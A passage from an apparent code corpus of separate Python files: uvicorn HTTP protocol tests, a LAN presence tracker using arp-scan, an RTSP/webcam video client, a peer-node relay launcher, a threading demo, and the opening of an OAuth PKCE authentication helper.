"peername": self.peername,
"sslcontext": self.sslcontext,
}.get(key)
def write(self, data):
assert not self.closed
self.buffer += data
def close(self):
assert not self.closed
self.closed = True
def pause_reading(self):
self.read_paused = True
def resume_reading(self):
self.read_paused = False
def is_closing(self):
return self.closed
def clear_buffer(self):
self.buffer = b""
def set_protocol(self, protocol):
pass
class MockLoop(asyncio.AbstractEventLoop):
def __init__(self, event_loop):
self.tasks = []
self.later = []
self.loop = event_loop
def is_running(self):
return True # pragma: no cover
def create_task(self, coroutine):
self.tasks.insert(0, coroutine)
return MockTask()
def call_later(self, delay, callback, *args):
self.later.insert(0, (delay, callback, args))
def run_one(self):
coroutine = self.tasks.pop()
self.run_until_complete(coroutine)
def run_until_complete(self, coroutine):
asyncio._set_running_loop(None)
try:
return self.loop.run_until_complete(coroutine)
finally:
asyncio._set_running_loop(self)
def close(self):
self.loop.close()
def run_later(self, with_delay):
later = []
for delay, callback, args in self.later:
if with_delay >= delay:
callback(*args)
else:
later.append((delay, callback, args))
self.later = later
class MockTask:
def add_done_callback(self, callback):
pass
@contextlib.contextmanager
def get_connected_protocol(app, protocol_cls, event_loop, **kwargs):
loop = MockLoop(event_loop)
asyncio._set_running_loop(loop)
transport = MockTransport()
config = Config(app=app, **kwargs)
server_state = ServerState()
protocol = protocol_cls(config=config, server_state=server_state, _loop=loop)
protocol.connection_made(transport)
try:
yield protocol
finally:
protocol.loop.close()
asyncio._set_running_loop(None)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_get_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
@pytest.mark.parametrize("path", ["/", "/?foo", "/?foo=bar", "/?foo=bar&baz=1"])
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_request_logging(path, protocol_cls, caplog, event_loop):
get_request_with_query_string = b"\r\n".join(
["GET {} HTTP/1.1".format(path).encode("ascii"), b"Host: example.org", b"", b""]
)
caplog.set_level(logging.INFO, logger="uvicorn.access")
logging.getLogger("uvicorn.access").propagate = True
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, log_config=None
) as protocol:
protocol.data_received(get_request_with_query_string)
protocol.loop.run_one()
assert '"GET {} HTTP/1.1" 200'.format(path) in caplog.records[0].message
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_head_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_HEAD_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" not in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_post_request(protocol_cls, event_loop):
async def app(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
response = Response(b"Body: " + body, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b'Body: {"hello": "world"}' in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_keepalive(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_keepalive_timeout(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert not protocol.transport.is_closing()
protocol.loop.run_later(with_delay=1)
assert not protocol.transport.is_closing()
protocol.loop.run_later(with_delay=5)
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_close(protocol_cls, event_loop):
app = Response(b"", status_code=204, headers={"connection": "close"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"0\r\n\r\n" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding_empty_body(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.buffer.count(b"0\r\n\r\n") == 1
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_chunked_encoding_head_request(protocol_cls, event_loop):
app = Response(
b"Hello, world!", status_code=200, headers={"transfer-encoding": "chunked"}
)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_HEAD_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_pipelined_requests(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Hello, world" in protocol.transport.buffer
protocol.transport.clear_buffer()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_undersized_request(protocol_cls, event_loop):
app = Response(b"xxx", headers={"content-length": "10"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_oversized_request(protocol_cls, event_loop):
app = Response(b"xxx" * 20, headers={"content-length": "10"})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_large_post_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(LARGE_POST_REQUEST)
assert protocol.transport.read_paused
protocol.loop.run_one()
assert not protocol.transport.read_paused
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_invalid_http(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(b"x" * 100000)
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_app_exception(protocol_cls, event_loop):
async def app(scope, receive, send):
raise Exception()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_exception_during_response(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b"1", "more_body": True})
raise Exception()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_no_response_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
pass
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_partial_response_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_duplicate_start_message(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.start", "status": 200})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" not in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_missing_start_message(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.body", "body": b""})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 500 Internal Server Error" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_message_after_body_complete(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b""})
await send({"type": "http.response.body", "body": b""})
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_value_returned(protocol_cls, event_loop):
async def app(scope, receive, send):
await send({"type": "http.response.start", "status": 200})
await send({"type": "http.response.body", "body": b""})
return 123
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_early_disconnect(protocol_cls, event_loop):
got_disconnect_event = False
async def app(scope, receive, send):
nonlocal got_disconnect_event
while True:
message = await receive()
if message["type"] == "http.disconnect":
break
got_disconnect_event = True
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.eof_received()
protocol.connection_lost(None)
protocol.loop.run_one()
assert got_disconnect_event
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_early_response(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(START_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
protocol.data_received(FINISH_POST_REQUEST)
assert not protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_read_after_response(protocol_cls, event_loop):
message_after_response = None
async def app(scope, receive, send):
nonlocal message_after_response
response = Response("Hello, world", media_type="text/plain")
await response(scope, receive, send)
message_after_response = await receive()
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_POST_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert message_after_response == {"type": "http.disconnect"}
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_http10_request(protocol_cls, event_loop):
async def app(scope, receive, send):
content = "Version: %s" % scope["http_version"]
response = Response(content, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(HTTP10_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Version: 1.0" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_root_path(protocol_cls, event_loop):
async def app(scope, receive, send):
path = scope.get("root_path", "") + scope["path"]
response = Response("Path: " + path, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(
app, protocol_cls, event_loop, root_path="/app"
) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b"Path: /app/" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_raw_path(protocol_cls, event_loop):
async def app(scope, receive, send):
path = scope["path"]
raw_path = scope.get("raw_path", None)
assert "/one/two" == path
assert b"/one%2Ftwo" == raw_path
response = Response("Done", media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(
app, protocol_cls, event_loop, root_path="/app"
) as protocol:
protocol.data_received(GET_REQUEST_WITH_RAW_PATH)
protocol.loop.run_one()
assert b"Done" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_max_concurrency(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, limit_concurrency=1
) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 503 Service Unavailable" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_shutdown_during_request(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.shutdown()
protocol.loop.run_one()
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_shutdown_during_idle(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.shutdown()
assert protocol.transport.buffer == b""
assert protocol.transport.is_closing()
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_100_continue_sent_when_body_consumed(protocol_cls, event_loop):
async def app(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
response = Response(b"Body: " + body, media_type="text/plain")
await response(scope, receive, send)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
EXPECT_100_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Expect: 100-continue",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
protocol.data_received(EXPECT_100_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 100 Continue" in protocol.transport.buffer
assert b"HTTP/1.1 200 OK" in protocol.transport.buffer
assert b'Body: {"hello": "world"}' in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_100_continue_not_sent_when_body_not_consumed(protocol_cls, event_loop):
app = Response(b"", status_code=204)
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
EXPECT_100_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Expect: 100-continue",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
protocol.data_received(EXPECT_100_REQUEST)
protocol.loop.run_one()
assert b"HTTP/1.1 100 Continue" not in protocol.transport.buffer
assert b"HTTP/1.1 204 No Content" in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_unsupported_upgrade_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(app, protocol_cls, event_loop, ws="none") as protocol:
protocol.data_received(UPGRADE_REQUEST)
assert b"HTTP/1.1 400 Bad Request" in protocol.transport.buffer
assert b"Unsupported upgrade request." in protocol.transport.buffer
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_supported_upgrade_request(protocol_cls, event_loop):
app = Response("Hello, world", media_type="text/plain")
with get_connected_protocol(
app, protocol_cls, event_loop, ws="wsproto"
) as protocol:
protocol.data_received(UPGRADE_REQUEST)
assert b"HTTP/1.1 426 " in protocol.transport.buffer
async def asgi3app(scope, receive, send):
pass
def asgi2app(scope):
async def asgi(receive, send):
pass
return asgi
asgi_scope_data = [
(asgi3app, {"version": "3.0", "spec_version": "2.3"}),
(asgi2app, {"version": "2.0", "spec_version": "2.3"}),
]
@pytest.mark.parametrize("asgi2or3_app, expected_scopes", asgi_scope_data)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_scopes(asgi2or3_app, expected_scopes, protocol_cls, event_loop):
with get_connected_protocol(asgi2or3_app, protocol_cls, event_loop) as protocol:
protocol.data_received(SIMPLE_GET_REQUEST)
protocol.loop.run_one()
assert expected_scopes == protocol.scope.get("asgi")
@pytest.mark.parametrize(
"request_line",
[
pytest.param(b"G?T / HTTP/1.1", id="invalid-method"),
pytest.param(b"GET /?x=y z HTTP/1.1", id="invalid-path"),
pytest.param(b"GET / HTTP1.1", id="invalid-http-version"),
],
)
@pytest.mark.parametrize("protocol_cls", HTTP_PROTOCOLS)
def test_invalid_http_request(request_line, protocol_cls, caplog, event_loop):
app = Response("Hello, world", media_type="text/plain")
request = INVALID_REQUEST_TEMPLATE % request_line
caplog.set_level(logging.INFO, logger="uvicorn.error")
logging.getLogger("uvicorn.error").propagate = True
with get_connected_protocol(app, protocol_cls, event_loop) as protocol:
protocol.data_received(request)
assert b"HTTP/1.1 400 Bad Request" in protocol.transport.buffer
assert b"Invalid HTTP request received." in protocol.transport.buffer
def test_fragmentation():
def receive_all(sock):
chunks = []
while True:
chunk = sock.recv(1024)
if not chunk:
break
chunks.append(chunk)
return b"".join(chunks)
app = Response("Hello, world", media_type="text/plain")
def send_fragmented_req(path):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 8000))
d = (
f"GET {path} HTTP/1.1\r\n" "Host: localhost\r\n" "Connection: close\r\n\r\n"
).encode()
split = len(path) // 2
sock.sendall(d[:split])
time.sleep(0.01)
sock.sendall(d[split:])
resp = receive_all(sock)
sock.shutdown(socket.SHUT_RDWR)
sock.close()
return resp
config = Config(app=app, http="httptools")
server = Server(config=config)
t = threading.Thread(target=server.run)
t.daemon = True
t.start()
time.sleep(1) # wait for uvicorn to start
path = "/?param=" + "q" * 10
response = send_fragmented_req(path)
bad_response = b"HTTP/1.1 400 Bad Request"
assert bad_response != response[: len(bad_response)]
server.should_exit = True
t.join()
|
presence.py | import subprocess
from time import sleep, strftime, time
from threading import Thread
# Edit these for how many people/devices you want to track
occupant = [""]
# MAC addresses for our phones
address = [""]
# Some arrays to help minimize streaming and account for devices
# disappearing from the network when asleep
firstRun = [1] * len(occupant)
presentSent = [0] * len(occupant)
notPresentSent = [0] * len(occupant)
counter = [0] * len(occupant)
def write_presence(occupant):
with open("presence.json", "a") as log:
log.write("{0},{1}\n".format(strftime("%Y-%m-%d %H:%M:%S"),str(occupant)))
def write_address(output):
with open("mac.json", "a") as log:
log.write("{0},{1}\n".format(strftime("%Y-%m-%d %H:%M:%S"),str(output)))
# Function that checks for device presence
def whosHere(i):
sleep(15)
# Loop through checking for devices and counting if they're not present
while True:
# Exits thread if Keyboard Interrupt occurs
if stop == True:
print "Exiting Thread"
exit()
else:
pass
# If a listed device address is present print and stream
if address[i] in output:
print(occupant[i] + "'s device is connected to your network")
if presentSent[i] == 0:
firstRun[i] = 0
presentSent[i] = 1
notPresentSent[i] = 0
counter[i] = 0
sleep(60)
else:
# If a stream's already been sent, just wait for 30 seconds
counter[i] = 0
sleep(60)
# If a listed device address is not present, print and stream
else:
print(occupant[i] + "'s device is not present")
# Only consider a device offline if it's counter has reached 30
# This is the same as 15 minutes passing
if counter[i] == 30 or firstRun[i] == 1:
firstRun[i] = 0
if notPresentSent[i] == 0:
notPresentSent[i] = 1
presentSent[i] = 0
counter[i] = 0
else:
# If a stream's already been sent, wait 30 seconds
counter[i] = 0
sleep(60)
# Count how many 30 second intervals have happened since the device
# disappeared from the network
else:
counter[i] = counter[i] + 1
print(occupant[i] + "'s counter at " + str(counter[i]))
sleep(60)
# Main thread
try:
# Initialize a variable to trigger threads to exit when True
global stop
stop = False
# Start the thread(s)
# It will start as many threads as there are values in the occupant array
for i in range(len(occupant)):
t = Thread(target=whosHere, args=(i,))
t.start()
while True:
# Make output global so the threads can see it
global output
# Assign list of devices on the network to "output"
output = subprocess.check_output("sudo arp-scan -l", shell=True)
write_presence(occupant)
write_address(output)
# Wait 60 seconds between scans
sleep(60)
except KeyboardInterrupt:
# On a keyboard interrupt signal threads to exit
stop = True
exit()
|
t0.py | import threading
from time import sleep
import sys
x=int()
p=int()
def c():
global x,p
while 1:
x=input()
#x=x+p
def printer():
global x,p
while 1:
#q=q+x
print(x)
sleep(1)
t1=threading.Thread(target=c)
t1.daemon=True
t1.start()
printer()
|
ffmpegstream.py | """ OpenCV Backend RTSP Client """
import cv2
from io import BytesIO
from PIL import Image
from threading import Thread
class Client:
""" Maintain live RTSP feed without buffering. """
_stream = None
def __init__(self, rtsp_server_uri, verbose = False):
"""
rtsp_server_uri: the path to an RTSP server. should start with "rtsp://"
verbose: print log or not
"""
self.rtsp_server_uri = rtsp_server_uri
self._verbose = verbose
self._bg = False
self._stream = cv2.VideoCapture(self.rtsp_server_uri)
if self._verbose:
print("Connected to video source {}.".format(self.rtsp_server_uri))
self.open()
def __enter__(self,*args,**kwargs):
""" Returns the object which later will have __exit__ called.
This relationship creates a context manager. """
return self
def __exit__(self, type=None, value=None, traceback=None):
""" Together with __enter__, allows support for `with-` clauses. """
self.close()
def open(self):
if self.isOpened():
return
self._bg = True
t = Thread(target=self._update, args=())
t.daemon = True
t.start()
return self
def close(self):
""" signal background thread to stop. release CV stream """
self._bg = False
self._stream.release()
if self._verbose:
print("Disconnected from {}".format(self.rtsp_server_uri))
def isOpened(self):
""" return true if stream is opened and being read, else ensure closed """
try:
return (self._stream is not None) and self._stream.isOpened() and self._bg
except:
self.close()
return False
def _update(self):
while self.isOpened():
(grabbed, frame) = self._stream.read()
if not grabbed:
self._bg = False
else:
self._queue = frame
def read(self,raw=False):
""" Retrieve most recent frame and convert to PIL. Return unconverted with raw=True. """
try:
if raw:
return self._queue
else:
return Image.fromarray(cv2.cvtColor(self._queue, cv2.COLOR_BGR2RGB))
except:
return None
def preview(self):
""" Blocking function. Opens OpenCV window to display stream. """
win_name = 'RTSP'
cv2.namedWindow(win_name, cv2.WINDOW_AUTOSIZE)
cv2.moveWindow(win_name,20,20)
while(self.isOpened()):
cv2.imshow(win_name,self.read(raw=True))
if cv2.waitKey(25) & 0xFF == ord('q'):
break
cv2.waitKey()
cv2.destroyAllWindows()
cv2.waitKey()
class PicamVideoFeed:
def __init__(self):
import picamera
self.cam = picamera.PiCamera()
def preview(self,*args,**kwargs):
""" Blocking function. Opens OpenCV window to display stream. """
self.cam.start_preview(*args,**kwargs)
def open(self):
pass
def isOpened(self):
return True
def read(self):
"""https://picamera.readthedocs.io/en/release-1.13/recipes1.html#capturing-to-a-pil-image"""
stream = BytesIO()
self.cam.capture(stream, format='png')
# "Rewind" the stream to the beginning so we can read its content
stream.seek(0)
return Image.open(stream)
def close(self):
pass
def stop(self):
pass
class WebcamVideoFeed:
def __init__(self, source_id, verbose = False):
"""
source_id: the id of a camera interface. Should be an integer
verbose: print log or not
"""
self._cam_id = source_id
self._verbose = verbose
self.open()
def __enter__(self,*args,**kwargs):
""" Returns the object which later will have __exit__ called.
This relationship creates a context manager. """
return self
def __exit__(self, type=None, value=None, traceback=None):
""" Together with __enter__, allows support for `with-` clauses. """
self.close()
def open(self):
if self.isOpened():
return
self._stream = cv2.VideoCapture(self._cam_id)
if self._verbose:
if self.isOpened():
print("Connected to video source {}.".format(self._cam_id))
else:
print("Failed to connect to source {}.".format(self._cam_id))
return
def close(self):
if self.isOpened():
self._stream.release()
def isOpened(self):
try:
return self._stream is not None and self._stream.isOpened()
except:
return False
def read(self):
(grabbed, frame) = self._stream.read()
return Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
def preview(self):
""" Blocking function. Opens OpenCV window to display stream. """
win_name = 'Camera'
cv2.namedWindow(win_name, cv2.WINDOW_AUTOSIZE)
cv2.moveWindow(win_name,20,20)
self.open()
while(self.isOpened()):
cv2.imshow(win_name,self._stream.read()[1])
if cv2.waitKey(25) & 0xFF == ord('q'):
break
cv2.waitKey()
cv2.destroyAllWindows()
cv2.waitKey()
|
run_severus.py | import severus
import _thread as thread
import socket
import requests
import random
import threading
import time
def is_relay():
def listen(port):
s = socket.socket()
s.bind(("0.0.0.0", port))
s.listen(5)
_, __ = s.accept()
_.close()
port = random.randint(5000, 9999)
try:
ip = requests.get("https://bot.whatismyipaddress.com").content.decode()
except:
ip = input("Could not get external IP address... what is it? ")
while port == severus.config.port:
port = random.randint(5000, 9999)
t = threading.Thread(target=listen, args=(port,))
t.start()
time.sleep(3) # Give thread time to start socket
s = socket.socket()
try:
s.settimeout(5)
s.connect((ip, port))
except:
s.close()
return False
s.close()
return True
if is_relay():
severus.config.is_relay = True
print("Relay Node")
thread.start_new_thread(severus.listen, ())
synced = False
while not synced:
try:
severus.sync()
synced = True
except Exception as e:
print(e)
time.sleep(30)
while True:
pass
else:
print("Leech node")
severus.config.is_relay = False
while True:
try:
severus.sync()
except Exception as e:
print(e)
time.sleep(30)
|
auth.py | import base64 as _base64
import hashlib as _hashlib
import os as _os
import re as _re
import webbrowser as _webbrowser
from multiprocessing import Process as _Process
from multiprocessing import Queue as _Queue
import keyring as _keyring
import requests as _requests
try: # Python 3.5+
from http import HTTPStatus as _StatusCodes
except ImportError:
try: # Python 3
from http import client as _StatusCodes
except ImportError: # Python 2
import httplib as _StatusCodes
try: # Python 3
import http.server as _BaseHTTPServer
except ImportError: # Python 2
import BaseHTTPServer as _BaseHTTPServer
try: # Python 3
import urllib.parse as _urlparse
from urllib.parse import urlencode as _urlencode
except ImportError: # Python 2
from urllib import urlencode as _urlencode
import urlparse as _urlparse
_code_verifier_length = 64
_random_seed_length = 40
_utf_8 = "utf-8"
# Identifies the service used for storing passwords in keyring
_keyring_service_name = "flyteauth"
# Identifies the key used for storing and fetching from keyring. In our case, instead of a username as the keyring docs
# suggest, we are storing a user's oidc.
_keyring_access_token_storage_key = "access_token"
_keyring_refresh_token_storage_key = "refresh_token"
def _generate_code_verifier():
"""
Generates a 'code_verifier' as described in https://tools.ietf.org/html/rfc7636#section-4.1
Adapted from https://github.com/openstack/deb-python-oauth2client/blob/master/oauth2client/_pkce.py.
:return str:
"""
code_verifier = _base64.urlsafe_b64encode(_os.urandom(_code_verifier_length)).decode(_utf_8)
# Eliminate invalid characters.
code_verifier = _re.sub(r"[^a-zA-Z0-9_\-.~]+", "", code_verifier)
if len(code_verifier) < 43:
raise ValueError("Verifier too short. number of bytes must be > 30.")
elif len(code_verifier) > 128:
raise ValueError("Verifier too long. number of bytes must be < 97.")
return code_verifier
def _generate_state_parameter():
state = _base64.urlsafe_b64encode(_os.urandom(_random_seed_length)).decode(_utf_8)
# Eliminate invalid characters.
code_verifier = _re.sub("[^a-zA-Z0-9-_.,]+", "", state)
return code_verifier
def _create_code_challenge(code_verifier):
"""
Adapted from https://github.com/openstack/deb-python-oauth2client/blob/master/oauth2client/_pkce.py.
:param str code_verifier: represents a code verifier generated by generate_code_verifier()
:return str: urlsafe base64-encoded sha256 hash digest
"""
code_challenge = _hashlib.sha256(code_verifier.encode(_utf_8)).digest()
code_challenge = _base64.urlsafe_b64encode(code_challenge).decode(_utf_8)
# Eliminate invalid characters
code_challenge = code_challenge.replace("=", "")
return code_challenge
class AuthorizationCode(object):
def __init__(self, code, state):
self._code = code
self._state = state
@property
def code(self):
return self._code
@property
def state(self):
return self._state
class OAuthCallbackHandler(_BaseHTTPServer.BaseHTTPRequestHandler):
"""
